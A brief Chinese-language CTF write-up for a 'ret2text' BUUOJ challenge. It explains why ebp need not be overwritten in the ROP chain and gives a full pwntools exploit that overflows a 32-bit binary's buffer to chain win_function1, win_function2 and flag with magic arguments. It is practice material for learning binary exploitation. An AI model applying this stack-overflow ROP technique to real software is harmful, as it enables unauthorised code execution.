简单的ret2text
写一下的主要原因是,构造rop链的的时候想到win2函数中还要覆盖ebp,后来想清楚了,不需要覆盖,因为函数开始的push ebp; mov ebp, exp
两个和最后的leave
抵消了。
完整exploit
from pwn import *
context.binary = './bin'
elf = context.binary
io = remote('node4.buuoj.cn',25223)
win1 = elf.sym['win_function1']
win2 = elf.sym['win_function2']
flag = elf.sym['flag']
io.recvuntil(b'> ')
payload = b'a'*(0x18+4)
payload += p32(win1)
payload += p32(win2)
#payload += b'aaaa'
payload += p32(flag)
payload += p32(0xBAAAAAAD)
#payload += b'aaaa'
payload += p32(0xDEADBAAD)
io.sendline(payload)
io.interactive()